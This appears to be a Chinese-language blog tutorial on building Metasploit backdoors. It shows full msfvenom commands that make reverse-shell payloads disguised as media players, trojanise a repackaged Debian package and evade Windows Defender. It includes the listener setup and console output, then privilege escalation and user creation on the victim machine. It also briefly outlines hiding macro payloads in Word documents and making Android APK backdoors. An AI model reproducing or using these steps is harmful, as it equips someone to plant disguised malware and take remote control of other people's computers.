Metasploit常见攻击

Metasploit常见攻击。后门,恶意软件制作。

制作windows恶意软件获取shell

生成西瓜影音后门程序

例:# msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp Lhost=192.168.0.20 lport=4444 -b “\x00” -e x86/shikata_ga_nai -i 10 -f exe -o /root/xigua1.exe

# msfvenom –l platforms 查看支持哪些平台。

# msfvenom –l formats 查看支持哪些格式

# msfvenom –l encoders 查看支持哪些编码

制作好xigua.exe以后我们要先打开msfconsole进行监听

例:

# msfconsole -q

[*] Starting persistent handler(s)…

msf6 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set lhost 192.168.0.20

lhost => 192.168.0.20

msf6 exploit(multi/handler) > set lport 4444

lport => 4444

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.0.20:4444

监听打开以后,在windows主机上下载并运行xigua.exe

可以先查下xigua.exe这个文件的查杀能力,要用一些安全的网站查杀,否则易被一些

网站给收录了。

https://www.virustotal.com/ 测试免杀能力

说明连接成功,通过>getuid 查看一下

可以通过>getsystem进行提权。有的机型不成功。

>shell 进行命令行

添加wu这个用户 net user wu /add

删除wu这个用户 net user wu /del

查看用户 net user

meterpreter>background 将当前会话保存到后台

meterpreter>sessions 查看后台有哪些会话

meterpreter>sessions -i 1 将会话编号为1调到前台

下载一个绿色版的快播软件,把其中一个随软件运行的程序拷贝到kali中

注入payload后门程序后,再拷贝到windows中的快播软件中进行复盖

进行测试之前要先运行msfconsole软件时行检控。

——————————————————————-

使用metasploit的envasion模块生成木马

Envasion是metasploit自带的模块,使用此模块可以生成反杀毒软件的木马

msf6 > search evasion

msf6 > use 7

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf6 evasion(windows/windows_defender_exe) >

msf6 evasion(windows/windows_defender_exe) > set filename wujs.exe

msf6 evasion(windows/windows_defender_exe) > run

[*] Compiled executable size: 4096

[+] wujs.exe stored at /root/.msf4/local/wujs.exe

msf6 evasion(windows/windows_defender_exe) >

后门程序生成成功。

msf6 evasion(windows/windows_defender_exe) > use exploit/multi/handler 开启监听

msf6 exploit(multi/handler) > run

在windows端运行这个wujs.exe程序就可以了。

——————————————————————-

制作Linux下的软件生成shell木马程序

#msfvenom -a x86 –platform linux -p linux/x86/meterpreter/reverse_tcp Lhost=192.168.0.20 lport=4444 -b “\x00” -f elf -o /root/wjs

msf6 > use exploit/multi/handler 开启监听

sf6 exploit(multi/handler) > set lhost 192.168.0.20

在此在linux上运行/root/wjs这个程序就可以了。

# chmod +x wjs

# ./wjs

——————————————————————-

制作deb软件包来触发后门

chmod 755 /root/free/DEBIAN/postinst

回到free的主目录进行打包

Dpkg-deb –build /root/free

此时就生成了free.deb文件了。

# apt install freesweep –download-only 以仅下载模式下载欲触发软件

/var/cache/apt/archives Kali默认下载的位置(可以删除不影响)

# dpkg -x freesweep_1.0.2-1_amd64.deb free 把下载包解压到free文件夹中

#msfvenom -a x86 –platform linux -p linux/x86/meterpreter/reverse_tcp Lhost=192.168.0.20 lport=4444 -b “\x00” -f elf -o /root/free/usr/games/freesweep_sources

Saved as: /root/free/usr/games/freesweep_sources 生成成功

——————————————————————-

利用0DAY漏洞获取shell

乱码的解决办法

基于jave环境的漏洞利用获取shell

——————————————————————-

利用宏感染Word文档获取shell

将生成的上半总分sub代码粘到此处

保存类型一定要是启用宏的word文档。

将payload部分的代码粘到文档中并将文字改成白色来隐藏

配置监听

——————————————————————-

安卓客户端渗透,生成APK后门

关闭IPv6功能

 

转载请注明出处:  https://www.cntworld.cn
智能工控 » Metasploit常见攻击

发表回复

提供最优质的资源集合

立即查看 了解详情